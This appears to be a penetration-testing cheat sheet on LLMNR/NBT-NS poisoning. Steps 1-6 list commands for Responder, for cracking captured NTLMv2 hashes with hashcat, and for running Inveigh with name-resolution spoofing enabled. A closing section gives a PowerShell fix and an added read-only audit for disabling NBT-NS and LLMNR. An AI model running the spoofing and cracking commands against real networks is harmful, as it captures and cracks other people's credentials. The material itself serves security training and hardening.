LLMNR/NBT-NS Poisoning

Step 1: Display Responder Help Menu

responder -h

Displays usage instructions and various available options in Responder from a Linux-based host.

Step 2: Crack NTLMv2 Hashes with Hashcat

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt

Uses Hashcat to crack NTLMv2 (-m 5600) hashes captured by Responder and saved in a file (forend_ntlmv2). Cracking is performed using the specified wordlist.

Step 3: Import Inveigh PowerShell Module

Import-Module .\Inveigh.ps1

Uses the Import-Module PowerShell cmdlet to import the Windows-based tool Inveigh.ps1.

Step 4: List Invoke-Inveigh Parameters

(Get-Command Invoke-Inveigh).Parameters

Outputs available options and functionalities for Invoke-Inveigh. Performed from a Windows-based host.

Step 5: Start Inveigh with LLMNR & NBNS Spoofing

Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Starts Inveigh on a Windows-based host with LLMNR and NBNS spoofing enabled. Output is shown in the console and written to a file.

Step 6: Start Inveigh C# Implementation

.\Inveigh.exe

Starts the C# implementation of Inveigh from a Windows-based host.

Step 7: Disable NBT-NS on Windows

$regkey = "HKLM:\SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey | foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose }

PowerShell script used to disable NBT-NS on a Windows host.
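
To confirm the Step 7 change took effect on every interface, and to see whether LLMNR is still answering on the same host, a read-only audit can be run afterwards. This is an added example, not part of the original cheat sheet: the function name Get-NameResolutionHardening is hypothetical, and the LLMNR policy key and its EnableMulticast value do not appear on this page (they are the registry location written by the "Turn off multicast name resolution" Group Policy setting).

```powershell
# Added example: read-only audit of NBT-NS and LLMNR settings on the local host.
# Makes no changes; run from an elevated or standard PowerShell session.
function Get-NameResolutionHardening {
    [CmdletBinding()]
    param()

    # Same per-interface key that Step 7 writes to.
    $netbtKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    # Assumption (not on the page): policy key behind "Turn off multicast name resolution".
    $llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'

    # NetbiosOptions: 0 = follow DHCP, 1 = enabled, 2 = disabled.
    $meaning = @{ 0 = 'Default (DHCP decides)'; 1 = 'Enabled'; 2 = 'Disabled' }

    # @() keeps the result an array even when only one interface exists.
    $results = @(foreach ($iface in Get-ChildItem -Path $netbtKey -ErrorAction Stop) {
        $value = (Get-ItemProperty -Path $iface.PSPath -Name NetbiosOptions `
                  -ErrorAction SilentlyContinue).NetbiosOptions
        if ($null -eq $value) { $value = 0 }   # a missing value behaves as the default
        [pscustomobject]@{
            Protocol = 'NBT-NS'
            Scope    = $iface.PSChildName      # Tcpip_{interface GUID}
            Setting  = $meaning[[int]$value]
            Hardened = ([int]$value -eq 2)
        }
    })

    # EnableMulticast = 0 turns LLMNR off; an absent value or 1 leaves it on.
    $llmnr = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast `
              -ErrorAction SilentlyContinue).EnableMulticast
    $llmnrSetting = if ($null -eq $llmnr) { 'Not configured (enabled)' }
                    elseif ($llmnr -eq 0) { 'Disabled' }
                    else { 'Enabled' }

    $results += [pscustomobject]@{
        Protocol = 'LLMNR'
        Scope    = 'Host policy'
        Setting  = $llmnrSetting
        Hardened = ($llmnr -eq 0)
    }
    $results
}

# Any row with Hardened = False still answers broadcast/multicast name queries.
Get-NameResolutionHardening | Format-Table -AutoSize
```

Step 7 only covers NBT-NS; a host that shows NBT-NS as Disabled but LLMNR as "Not configured (enabled)" still responds to the LLMNR queries that Steps 1 and 5 rely on.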
